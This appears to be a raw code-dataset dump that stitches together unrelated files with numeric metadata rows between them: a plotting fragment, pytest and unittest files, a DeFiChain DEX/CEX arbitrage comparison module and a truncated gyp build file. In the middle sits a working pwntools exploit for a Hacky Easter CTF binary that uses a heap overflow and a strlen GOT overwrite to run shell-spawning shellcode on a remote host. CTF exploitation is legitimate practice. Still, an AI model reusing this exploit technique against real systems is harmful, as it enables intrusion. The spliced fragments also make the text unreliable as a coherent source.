_sample['TotalAlkalis'], s=150, edgecolors='w', facecolors='red', marker='P', label='User Data') if plot_type == 'xy': _sample = user_data.copy() plt.scatter(_sample[x], _sample[y], s=150, edgecolors='w', facecolors='red', marker='P', label='User Data') if legend: plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left") fig.tight_layout() if isinstance(save_fig, str): fig.savefig(save_fig) return fig, ax1 def show(): """ Local implementation of pyplot.show(). For displaying created plots. """ plt.show()
40.100742
80
0.532276
4,458
37,815
4.373935
0.114401
0.012719
0.006923
0.013539
0.522745
0.469101
0.42915
0.376789
0.346582
0.320016
0
0.017262
0.374957
37,815
942
81
40.143312
0.807709
0.2801
0
0.467972
0
0
0.08569
0
0
0
0
0
0
1
0.014235
false
0.021352
0.014235
0
0.042705
0.003559
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c9d0224c8f3e8cd2f2000caf10456ad5cb58d3
824
py
Python
test/test_tools.py
translationalneurosurgery/tool-dimep
d2e3f8847d8a43d75b9ffc2dfaf65e5d1662c8ae
[ "MIT" ]
2
2021-11-01T11:48:59.000Z
2021-11-03T19:07:16.000Z
test/test_tools.py
agricolab/tool-dimep
d2e3f8847d8a43d75b9ffc2dfaf65e5d1662c8ae
[ "MIT" ]
2
2021-03-31T10:47:46.000Z
2021-03-31T11:31:51.000Z
test/test_tools.py
neuromti/tool-dimep
36f9f404c99a53e85c9c492c4b0a281f832e07ba
[ "MIT" ]
null
null
null
from dimep.tools import * import numpy as np import pytest @pytest.mark.parametrize("binsize", np.arange(1.0, 20.0, 1.0)) def test_downbin(binsize): x = np.arange(0.0, 100.0, 1) if binsize == 1.0: xhat = x else: xhat = np.arange((binsize - 1) / 2, 100.0 - binsize / 2, binsize) assert np.allclose(down_bin(x, int(binsize)), xhat) def test_bwboundaries(): assert np.allclose(bw_boundaries([0, 1, 1, 0]), [0, 1, 1, 0]) assert np.allclose(bw_boundaries([0, 1, 1, 0, 1]), [0, 1, 1, 0, 2]) assert np.allclose(bw_boundaries([1, 1, 1, 0, 1]), [1, 1, 1, 0, 2]) assert np.allclose(bw_boundaries([1, 1, 1, 1, 1]), [1, 1, 1, 1, 1]) assert np.allclose(bw_boundaries([1, 1, 0, 0, 1]), [1, 1, 0, 0, 2]) assert np.allclose(bw_boundaries([1, 1, 0, 1, 0, 1]), [1, 1, 0, 2, 0, 3])
34.333333
77
0.583738
154
824
3.064935
0.214286
0.101695
0.082627
0.067797
0.476695
0.459746
0.447034
0.434322
0.366525
0.148305
0
0.127889
0.212379
824
23
78
35.826087
0.599384
0
0
0
0
0
0.008495
0
0
0
0
0
0.388889
1
0.111111
false
0
0.166667
0
0.277778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99cba028d63bd0b3002ecf1a8511685b7a12c347
6,825
py
Python
crypto_comparison.py
tomsch1/defichain-arbitrage-telegram-bot
b9f5291eaa60771c0ae28f832467393611de3da4
[ "MIT" ]
1
2022-03-01T14:19:49.000Z
2022-03-01T14:19:49.000Z
crypto_comparison.py
tomsch1/defichain-arbitrage-telegram-bot
b9f5291eaa60771c0ae28f832467393611de3da4
[ "MIT" ]
null
null
null
crypto_comparison.py
tomsch1/defichain-arbitrage-telegram-bot
b9f5291eaa60771c0ae28f832467393611de3da4
[ "MIT" ]
null
null
null
import cexdatacollect import dfi_dex_prices from symbols import CryptoExchangeSymbols class SymbolPrice(): def __init__(self, exchange_name:str, symbol:str, price:float): self.exchange_name: str = exchange_name self.symbol: str = symbol self.price: float = price class IndirectComparison(): def __init__(self, ex_name: str, cex_dfi_pair: SymbolPrice, dex_dfi_pair: SymbolPrice, intermediate_pair: SymbolPrice=None, percentage_minus_one :bool = True): self.ex_name: str = ex_name self.dex_dfi_pair = dex_dfi_pair self.cex_dfi_pair = cex_dfi_pair self.intermediate_pair = intermediate_pair if intermediate_pair is None: perc = (dex_dfi_pair.price/cex_dfi_pair.price) if percentage_minus_one: perc = perc -1 self.percentage: float = perc else: print(f"{dex_dfi_pair.symbol} = {dex_dfi_pair.price}, {intermediate_pair.symbol} = {intermediate_pair.price}, {cex_dfi_pair.symbol} = {cex_dfi_pair.price}") perc = (dex_dfi_pair.price/(cex_dfi_pair.price/intermediate_pair.price)) if percentage_minus_one: perc = perc -1 self.percentage: float = perc class AggregatedComparison(): def __init__(self, cex_name: str, symbol, cex_price, dex_price): self.cex_name: str = cex_name self.symbol: CryptoExchangeSymbols = symbol self.cex_price: float = cex_price self.dex_price: float = dex_price self.percentage: float = (dex_price/cex_price)-1 class CryptoComparison(): all_pairs = [] def __init__(self, dex_data: dfi_dex_prices.DfiDexPrices, cex_data: cexdatacollect.CexPriceFetch): self.dex_data = dex_data self.cex_data = cex_data def get_indirect_comparison(self, dfi_symbol: CryptoExchangeSymbols, intermediate_symbol: CryptoExchangeSymbols = None, inverse_intermediate_symbol: bool = False, inverse_cex_dfi_price: bool = True): exchange_name = 'KuCoin' dex_dfi_price = float(self.dex_data.dex_crypto_state_map[dfi_symbol.d_token()].data.price_ratio.ba) if intermediate_symbol is not None: intermediate_price = 1/float(self.cex_data.cex_price_state[exchange_name][intermediate_symbol.value]['last']) if inverse_intermediate_symbol: new_cex_symbol = f"DFI/{intermediate_symbol.value.split('/')[0]}" inverse_intermediate_symbol = f"{intermediate_symbol.value.split('/')[1]}/{intermediate_symbol.value.split('/')[0]}" intermediate_pair = SymbolPrice(exchange_name, inverse_intermediate_symbol, intermediate_price) else: new_cex_symbol = f"DFI/{intermediate_symbol.value.split('/')[1]}" intermediate_pair = SymbolPrice(exchange_name, intermediate_symbol.value, intermediate_price) cex_dfi_price = float(self.cex_data.cex_price_state[exchange_name][new_cex_symbol]['last']) if inverse_cex_dfi_price: cex_dfi_price = 1 / cex_dfi_price cex_dfi_pair = SymbolPrice(exchange_name, new_cex_symbol, cex_dfi_price) else: intermediate_pair = None cex_dfi_price = float(self.cex_data.cex_price_state[exchange_name][dfi_symbol.value]['last']) if inverse_cex_dfi_price: cex_dfi_price = 1 / cex_dfi_price cex_dfi_pair = SymbolPrice(exchange_name, dfi_symbol.value, cex_dfi_price) return IndirectComparison( ex_name=exchange_name, cex_dfi_pair=cex_dfi_pair, dex_dfi_pair=SymbolPrice('dex', dfi_symbol.value, dex_dfi_price), intermediate_pair=intermediate_pair, percentage_minus_one=inverse_cex_dfi_price ) def get_all_comparisons(self) -> [SymbolPrice]: return [ self.get_indirect_comparison(CryptoExchangeSymbols.DFIBTC, None), self.get_indirect_comparison(CryptoExchangeSymbols.DFIUSDT, None), self.get_maximum_percentage(CryptoExchangeSymbols.DFIETH, [CryptoExchangeSymbols.ETHBTC, CryptoExchangeSymbols.ETHUSDT]), self.get_maximum_percentage(CryptoExchangeSymbols.DFILTC, [CryptoExchangeSymbols.LTCBTC, CryptoExchangeSymbols.LTCUSDT]), #Something is wrong here! #self.get_indirect_comparison(ExchangeSymbol.DFIUSDC, ExchangeSymbol.BTCUSDC, True, False), self.get_indirect_comparison(CryptoExchangeSymbols.DFIUSDC, CryptoExchangeSymbols.USDTUSDC, True), self.get_maximum_percentage(CryptoExchangeSymbols.DFIBCH, [CryptoExchangeSymbols.BCHBTC, CryptoExchangeSymbols.BCHUSDT]), self.get_maximum_percentage(CryptoExchangeSymbols.DFIDOGE, [CryptoExchangeSymbols.DOGEBTC, CryptoExchangeSymbols.DOGEUSDT]), ] def get_maximum_percentage(self, dfi_symbol: CryptoExchangeSymbols, intermediate_pairs: [CryptoExchangeSymbols]): all_paths = [] percentages = [] for pair in intermediate_pairs: path = self.get_indirect_comparison(dfi_symbol, pair) all_paths.append(path) percentages.append(abs(path.percentage)) index_of_highest_percentage = percentages.index(max(percentages)) return all_paths[index_of_highest_percentage] def update_pairs(self): self.all_pairs = self.get_all_comparisons() def get_overview(self): pairs: [SymbolPrice] = self.get_all_comparisons() pair_text = [] for pair in sorted(pairs, key=lambda x: abs(x.percentage), reverse=True): if pair.intermediate_pair is None: text = f""" DFI -> {pair.dex_dfi_pair.symbol.split('/')[1]}: DEX:\t{round(pair.dex_dfi_pair.price, 3)} DFI {pair.ex_name}:\t{round(pair.cex_dfi_pair.price, 3)} DFI \t{round(pair.percentage*100, 2)} % """ else: text = f""" DFI -> {pair.dex_dfi_pair.symbol.split('/')[1]}: DEX:\t{round(pair.dex_dfi_pair.price, 3)} DFI {pair.ex_name} via {pair.intermediate_pair.symbol.split('/')[1]}:\t{round(pair.cex_dfi_pair.price / pair.intermediate_pair.price, 3)} DFI \t{round(pair.percentage * 100, 2)} % """ pair_text.append(text) single_pair_text_string = '\n'.join(pair_text) return f" Current premium overview:\n{single_pair_text_string}" def evaluate_alarm(self, symbol_name, threshold: float): for pair in self.all_pairs: symbol = CryptoExchangeSymbols.from_string(symbol_name) if pair.dex_dfi_pair.symbol == symbol.value: if abs(pair.percentage) >= abs(threshold): return pair
46.114865
203
0.670183
796
6,825
5.409548
0.15201
0.048769
0.03019
0.022759
0.391779
0.217139
0.195309
0.185787
0.185787
0.142127
0
0.004784
0.234286
6,825
147
204
46.428571
0.819173
0.016703
0
0.210526
0
0.017544
0.151551
0.102625
0
0
0
0
0
1
0.087719
false
0
0.026316
0.008772
0.201754
0.008772
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99cc57d801b28345067bcc1957c433411f4b1448
3,915
py
Python
HackyEaster/he2022/level8/ch37/solve37_unlink.py
tbrup/ctf-writeups
dfac11abb3051af657ed3384c3c389c14a40c10e
[ "MIT" ]
null
null
null
HackyEaster/he2022/level8/ch37/solve37_unlink.py
tbrup/ctf-writeups
dfac11abb3051af657ed3384c3c389c14a40c10e
[ "MIT" ]
null
null
null
HackyEaster/he2022/level8/ch37/solve37_unlink.py
tbrup/ctf-writeups
dfac11abb3051af657ed3384c3c389c14a40c10e
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # This exploit template was generated via: # $ pwn template --host 46.101.107.117 --port 2208 ./eggo from pwn import * # Set up pwntools for the correct architecture exe = context.binary = ELF('./eggo') # libc = ELF('./libc-2.33.so') # Many built-in settings can be controlled on the command-line and show up # in "args". For example, to dump all data sent/received, and disable ASLR # for all created processes... # ./exploit.py DEBUG NOASLR # ./exploit.py GDB HOST=example.com PORT=4141 host = args.HOST or '46.101.107.117' port = int(args.PORT or 2208) def start_local(argv=[], *a, **kw): '''Execute the target binary locally''' if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw) def start_remote(argv=[], *a, **kw): '''Connect to the process on the remote host''' io = connect(host, port) if args.GDB: gdb.attach(io, gdbscript=gdbscript) return io def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.LOCAL: return start_local(argv, *a, **kw) else: return start_remote(argv, *a, **kw) # Specify your GDB script here for debugging # GDB will be launched if the exploit is run via e.g. # ./exploit.py GDB gdbscript = ''' tbreak main continue '''.format(**locals()) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: No PIE (0x400000) EGG = 0x004040e0 io = start() # first allocate memory for egg 0,1,2 eggsize = 64 if eggsize % 8 != 0: bufsize = eggsize+8 else: bufsize = eggsize+16 io.recvuntil(b'> ') io.sendline(b'1\n%d'%eggsize) print(io.recvline()) io.sendline(b'1\n%d'%eggsize) print(io.recvline()) io.sendline(b'1\n%d'%eggsize) print(io.recvline()) # io.sendline(b'1\n24') # create shellcode, then edit egg 0 sc = asm('nop;'*16 + shellcraft.amd64.linux.sh()) payload = sc + (b'0' * (bufsize-len(sc)-16)) + p64(-8, sign = "signed") + p64(-8, sign = "signed") + p64(exe.got["strlen"]) + p64(0x4052b0) print('Address of puts: ' , hex(exe.got["puts"])) print('Address of strlen: ' , hex(exe.got["strlen"])) # print('Address of puts: ' , p32(exe.got["puts"])) # payload = cyclic(44, n=4) io.sendline(b'4\n0') #io.sendline(b'0'*(bufsize-8) + p64(0x55)) #print(io.recvline()) #io.sendline(b'4\n1') io.sendline(payload) print(io.recvline()) # io.sendline(b'3\n0') # print(io.recvline()) # io.sendline(b'3\n1') # print(io.recvline()) # io.sendline(b'4\n1') # io.sendline(b'make me crash') # print(io.recvline()) # io.sendline(b'3\n0') # print(io.recvline()) # io.sendline(b'3\n1') # print(io.recvline()) # now delete egg 0 to execute the shellcode io.sendline(b'2\n1') # shellcode = asm(shellcraft.sh()) # payload = fit({ # 32: 0xdeadbeef, # 'iaaa': [1, 2, 'Hello', 3] # }, length=128) # io.send(payload) # flag = io.recv(...) # log.success(flag) with open('payload', 'wb') as outF: outF.write(b'1\n%d\n1\n%d\n1\n%d\n'%(eggsize,eggsize,eggsize)) outF.write(b'4\n0\n') outF.write(b'0'*(bufsize-8) + p64(0x54) + b'\n') outF.write(b'4\n1\n') outF.write(payload) outF.write(b'\n2\n1\n') # log.info("Address of fullname: {}".format(hex(address))) # log.info("Address of win(): {}".format(hex(exe.symbols["win"]))) # log.info("shellcode:\n{}".format(hexdump(shellcode))) # payload = shellcode + ('B' * (664-len(shellcode))) + p32(100, sign = "signed") + p32(-4, sign = "signed") + p32(exe.got["puts"] - 12) + p32(address) # log.info("payload:\n{}".format(hexdump(payload))) # io.sendlineafter("Input fullname", payload) # io.sendlineafter("Input lastname", "a") #print(io.recvline()) io.interactive()
29
150
0.614304
595
3,915
4.035294
0.347899
0.062474
0.06414
0.070804
0.206581
0.137026
0.137026
0.137026
0.137026
0.137026
0
0.051415
0.160409
3,915
134
151
29.216418
0.679039
0.547382
0
0.226415
1
0
0.111307
0.012367
0
0
0.012956
0
0
1
0.056604
false
0
0.018868
0
0.169811
0.113208
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
99ccf27382ed8c167f71ca16ab953e0670010da4
481
py
Python
test/TestClasse.py
AMadianov/Calc-python
449b6747d3ba6558eaf950a45aa33563aee06238
[ "MIT" ]
null
null
null
test/TestClasse.py
AMadianov/Calc-python
449b6747d3ba6558eaf950a45aa33563aee06238
[ "MIT" ]
null
null
null
test/TestClasse.py
AMadianov/Calc-python
449b6747d3ba6558eaf950a45aa33563aee06238
[ "MIT" ]
null
null
null
import unittest class MyClass(object): def __init__(self, foo): if foo != 1: raise ValueError("foo is not equal to 1!") class MyClass2(object): def __init__(self): pass class TestFoo(unittest.TestCase): def testInsufficientArgs(self): foo = 0 self.assertRaises(ValueError, MyClass, foo) def testArgs(self): self.assertRaises(TypeError, MyClass2, ("fsa", "fds")) if __name__ == '__main__': unittest.main()
22.904762
62
0.632017
55
481
5.236364
0.545455
0.0625
0.090278
0.118056
0
0
0
0
0
0
0
0.01385
0.24948
481
21
63
22.904762
0.783934
0
0
0
0
0
0.074689
0
0
0
0
0
0.125
1
0.25
false
0.0625
0.0625
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
99ce937a922710b30381f8493591068886a8598c
25,467
gyp
Python
groups/bsl/bslmf/bslmf.gyp
zhanzju/bsl
1bb79982cff9bbaa3fb6d038604f04283ba76f07
[ "MIT" ]
1
2015-11-06T05:25:03.000Z
2015-11-06T05:25:03.000Z
groups/bsl/bslmf/bslmf.gyp
zhanzju/bsl
1bb79982cff9bbaa3fb6d038604f04283ba76f07
[ "MIT" ]
null
null
null
groups/bsl/bslmf/bslmf.gyp
zhanzju/bsl
1bb79982cff9bbaa3fb6d038604f04283ba76f07
[ "MIT" ]
null
null
null
{ 'variables': { 'bslmf_sources': [ 'bslmf_addconst.cpp', 'bslmf_addcv.cpp', 'bslmf_addlvaluereference.cpp', 'bslmf_addpointer.cpp', 'bslmf_addreference.cpp', 'bslmf_addrvaluereference.cpp', 'bslmf_addvolatile.cpp', 'bslmf_arraytopointer.cpp', 'bslmf_assert.cpp', 'bslmf_conditional.cpp', 'bslmf_detectnestedtrait.cpp', 'bslmf_enableif.cpp', 'bslmf_forwardingtype.cpp', 'bslmf_functionpointertraits.cpp', 'bslmf_haspointersemantics.cpp', 'bslmf_if.cpp', 'bslmf_integralconstant.cpp', 'bslmf_isarithmetic.cpp', 'bslmf_isarray.cpp', 'bslmf_isbitwiseequalitycomparable.cpp', 'bslmf_isbitwisemoveable.cpp', 'bslmf_isclass.cpp', 'bslmf_isconst.cpp', 'bslmf_isconvertible.cpp', 'bslmf_isconvertibletoany.cpp', 'bslmf_isenum.cpp', 'bslmf_isfloatingpoint.cpp', 'bslmf_isfunction.cpp', 'bslmf_isfundamental.cpp', 'bslmf_isintegral.cpp', 'bslmf_islvaluereference.cpp', 'bslmf_ismemberfunctionpointer.cpp', 'bslmf_ismemberobjectpointer.cpp', 'bslmf_ismemberpointer.cpp', 'bslmf_ispair.cpp', 'bslmf_ispointer.cpp', 'bslmf_ispointertomember.cpp', 'bslmf_ispolymorphic.cpp', 'bslmf_isreference.cpp', 'bslmf_isrvaluereference.cpp', 'bslmf_issame.cpp', 'bslmf_istriviallycopyable.cpp', 'bslmf_istriviallydefaultconstructible.cpp', 'bslmf_isvoid.cpp', 'bslmf_isvolatile.cpp', 'bslmf_matchanytype.cpp', 'bslmf_matcharithmetictype.cpp', 'bslmf_memberfunctionpointertraits.cpp', 'bslmf_metaint.cpp', 'bslmf_nestedtraitdeclaration.cpp', 'bslmf_nil.cpp', 'bslmf_removeconst.cpp', 'bslmf_removecv.cpp', 'bslmf_removecvq.cpp', 'bslmf_removepointer.cpp', 'bslmf_removereference.cpp', 'bslmf_removevolatile.cpp', 'bslmf_selecttrait.cpp', 'bslmf_switch.cpp', 'bslmf_tag.cpp', 'bslmf_typelist.cpp', ], 'bslmf_tests': [ 'bslmf_addconst.t', 'bslmf_addcv.t', 'bslmf_addlvaluereference.t', 'bslmf_addpointer.t', 'bslmf_addreference.t', 'bslmf_addrvaluereference.t', 'bslmf_addvolatile.t', 'bslmf_arraytopointer.t', 'bslmf_assert.t', 'bslmf_conditional.t', 'bslmf_detectnestedtrait.t', 'bslmf_enableif.t', 'bslmf_forwardingtype.t', 'bslmf_functionpointertraits.t', 'bslmf_haspointersemantics.t', 'bslmf_if.t', 'bslmf_integralconstant.t', 'bslmf_isarithmetic.t', 'bslmf_isarray.t', 'bslmf_isbitwiseequalitycomparable.t', 'bslmf_isbitwisemoveable.t', 'bslmf_isclass.t', 'bslmf_isconst.t', 'bslmf_isconvertible.t', 'bslmf_isconvertibletoany.t', 'bslmf_isenum.t', 'bslmf_isfloatingpoint.t', 'bslmf_isfunction.t', 'bslmf_isfundamental.t', 'bslmf_isintegral.t', 'bslmf_islvaluereference.t', 'bslmf_ismemberfunctionpointer.t', 'bslmf_ismemberobjectpointer.t', 'bslmf_ismemberpointer.t', 'bslmf_ispair.t', 'bslmf_ispointer.t', 'bslmf_ispointertomember.t', 'bslmf_ispolymorphic.t', 'bslmf_isreference.t', 'bslmf_isrvaluereference.t', 'bslmf_issame.t', 'bslmf_istriviallycopyable.t', 'bslmf_istriviallydefaultconstructible.t', 'bslmf_isvoid.t', 'bslmf_isvolatile.t', 'bslmf_matchanytype.t', 'bslmf_matcharithmetictype.t', 'bslmf_memberfunctionpointertraits.t', 'bslmf_metaint.t', 'bslmf_nestedtraitdeclaration.t', 'bslmf_nil.t', 'bslmf_removeconst.t', 'bslmf_removecv.t', 'bslmf_removecvq.t', 'bslmf_removepointer.t', 'bslmf_removereference.t', 'bslmf_removevolatile.t', 'bslmf_selecttrait.t', 'bslmf_switch.t', 'bslmf_tag.t', 'bslmf_typelist.t', ], 'bslmf_tests_paths': [ '<(PRODUCT_DIR)/bslmf_addconst.t', '<(PRODUCT_DIR)/bslmf_addcv.t', '<(PRODUCT_DIR)/bslmf_addlvaluereference.t', '<(PRODUCT_DIR)/bslmf_addpointer.t', '<(PRODUCT_DIR)/bslmf_addreference.t', '<(PRODUCT_DIR)/bslmf_addrvaluereference.t', '<(PRODUCT_DIR)/bslmf_addvolatile.t', '<(PRODUCT_DIR)/bslmf_arraytopointer.t', '<(PRODUCT_DIR)/bslmf_assert.t', '<(PRODUCT_DIR)/bslmf_conditional.t', '<(PRODUCT_DIR)/bslmf_detectnestedtrait.t', '<(PRODUCT_DIR)/bslmf_enableif.t', '<(PRODUCT_DIR)/bslmf_forwardingtype.t', '<(PRODUCT_DIR)/bslmf_functionpointertraits.t', '<(PRODUCT_DIR)/bslmf_haspointersemantics.t', '<(PRODUCT_DIR)/bslmf_if.t', '<(PRODUCT_DIR)/bslmf_integralconstant.t', '<(PRODUCT_DIR)/bslmf_isarithmetic.t', '<(PRODUCT_DIR)/bslmf_isarray.t', '<(PRODUCT_DIR)/bslmf_isbitwiseequalitycomparable.t', '<(PRODUCT_DIR)/bslmf_isbitwisemoveable.t', '<(PRODUCT_DIR)/bslmf_isclass.t', '<(PRODUCT_DIR)/bslmf_isconst.t', '<(PRODUCT_DIR)/bslmf_isconvertible.t', '<(PRODUCT_DIR)/bslmf_isconvertibletoany.t', '<(PRODUCT_DIR)/bslmf_isenum.t', '<(PRODUCT_DIR)/bslmf_isfloatingpoint.t', '<(PRODUCT_DIR)/bslmf_isfunction.t', '<(PRODUCT_DIR)/bslmf_isfundamental.t', '<(PRODUCT_DIR)/bslmf_isintegral.t', '<(PRODUCT_DIR)/bslmf_islvaluereference.t', '<(PRODUCT_DIR)/bslmf_ismemberfunctionpointer.t', '<(PRODUCT_DIR)/bslmf_ismemberobjectpointer.t', '<(PRODUCT_DIR)/bslmf_ismemberpointer.t', '<(PRODUCT_DIR)/bslmf_ispair.t', '<(PRODUCT_DIR)/bslmf_ispointer.t', '<(PRODUCT_DIR)/bslmf_ispointertomember.t', '<(PRODUCT_DIR)/bslmf_ispolymorphic.t', '<(PRODUCT_DIR)/bslmf_isreference.t', '<(PRODUCT_DIR)/bslmf_isrvaluereference.t', '<(PRODUCT_DIR)/bslmf_issame.t', '<(PRODUCT_DIR)/bslmf_istriviallycopyable.t', '<(PRODUCT_DIR)/bslmf_istriviallydefaultconstructible.t', '<(PRODUCT_DIR)/bslmf_isvoid.t', '<(PRODUCT_DIR)/bslmf_isvolatile.t', '<(PRODUCT_DIR)/bslmf_matchanytype.t', '<(PRODUCT_DIR)/bslmf_matcharithmetictype.t', '<(PRODUCT_DIR)/bslmf_memberfunctionpointertraits.t', '<(PRODUCT_DIR)/bslmf_metaint.t', '<(PRODUCT_DIR)/bslmf_nestedtraitdeclaration.t', '<(PRODUCT_DIR)/bslmf_nil.t', '<(PRODUCT_DIR)/bslmf_removeconst.t', '<(PRODUCT_DIR)/bslmf_removecv.t', '<(PRODUCT_DIR)/bslmf_removecvq.t', '<(PRODUCT_DIR)/bslmf_removepointer.t', '<(PRODUCT_DIR)/bslmf_removereference.t', '<(PRODUCT_DIR)/bslmf_removevolatile.t', '<(PRODUCT_DIR)/bslmf_selecttrait.t', '<(PRODUCT_DIR)/bslmf_switch.t', '<(PRODUCT_DIR)/bslmf_tag.t', '<(PRODUCT_DIR)/bslmf_typelist.t', ], 'bslmf_pkgdeps': [ '../bsls/bsls.gyp:bsls', '../bslscm/bslscm.gyp:bslscm', ], }, 'targets': [ { 'target_name': 'bslmf_sources', 'type': 'none', 'direct_dependent_settings': { 'sources': [ '<@(bslmf_sources)' ], 'include_dirs': [ '.' ], }, }, { 'target_name': 'bslmf_tests_build', 'type': 'none', 'dependencies': [ '<@(bslmf_tests)' ], }, { 'target_name': 'bslmf_tests_run', 'type': 'none', 'dependencies': [ 'bslmf_tests_build' ], 'sources': [ '<@(bslmf_tests_paths)' ], 'rules': [ { 'rule_name': 'run_unit_tests', 'extension': 't', 'inputs': [ '<@(bslmf_tests_paths)' ], 'outputs': [ '<(INTERMEDIATE_DIR)/<(RULE_INPUT_ROOT).t.ran' ], 'action': [ '<(python_path)', '<(DEPTH)/tools/run_unit_tests.py', '<(RULE_INPUT_PATH)', '<@(_outputs)', '--abi=<(ABI_bits)', '--lib=<(library)' ], 'msvs_cygwin_shell': 0, }, ], }, { 'target_name': 'bslmf', 'type': '<(library)', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf_sources', ], 'export_dependent_settings': [ '<@(bslmf_pkgdeps)' ], 'direct_dependent_settings': { 'include_dirs': [ '.' ] }, # Mac OS X empty LD_DYLIB_INSTALL_NAME causes executable and shared # libraries linking against dylib to store same path for use at runtime 'xcode_settings': { 'LD_DYLIB_INSTALL_NAME': '' }, }, { 'target_name': 'bslmf_addconst.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addconst.t.cpp' ], }, { 'target_name': 'bslmf_addcv.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addcv.t.cpp' ], }, { 'target_name': 'bslmf_addlvaluereference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addlvaluereference.t.cpp' ], }, { 'target_name': 'bslmf_addpointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addpointer.t.cpp' ], }, { 'target_name': 'bslmf_addreference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addreference.t.cpp' ], }, { 'target_name': 'bslmf_addrvaluereference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addrvaluereference.t.cpp' ], }, { 'target_name': 'bslmf_addvolatile.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addvolatile.t.cpp' ], }, { 'target_name': 'bslmf_arraytopointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_arraytopointer.t.cpp' ], }, { 'target_name': 'bslmf_assert.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_assert.t.cpp' ], }, { 'target_name': 'bslmf_conditional.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_conditional.t.cpp' ], }, { 'target_name': 'bslmf_detectnestedtrait.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_detectnestedtrait.t.cpp' ], }, { 'target_name': 'bslmf_enableif.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_enableif.t.cpp' ], }, { 'target_name': 'bslmf_forwardingtype.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_forwardingtype.t.cpp' ], }, { 'target_name': 'bslmf_functionpointertraits.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_functionpointertraits.t.cpp' ], }, { 'target_name': 'bslmf_haspointersemantics.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_haspointersemantics.t.cpp' ], }, { 'target_name': 'bslmf_if.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_if.t.cpp' ], }, { 'target_name': 'bslmf_integralconstant.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_integralconstant.t.cpp' ], }, { 'target_name': 'bslmf_isarithmetic.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isarithmetic.t.cpp' ], }, { 'target_name': 'bslmf_isarray.t', 'type': 'executable', 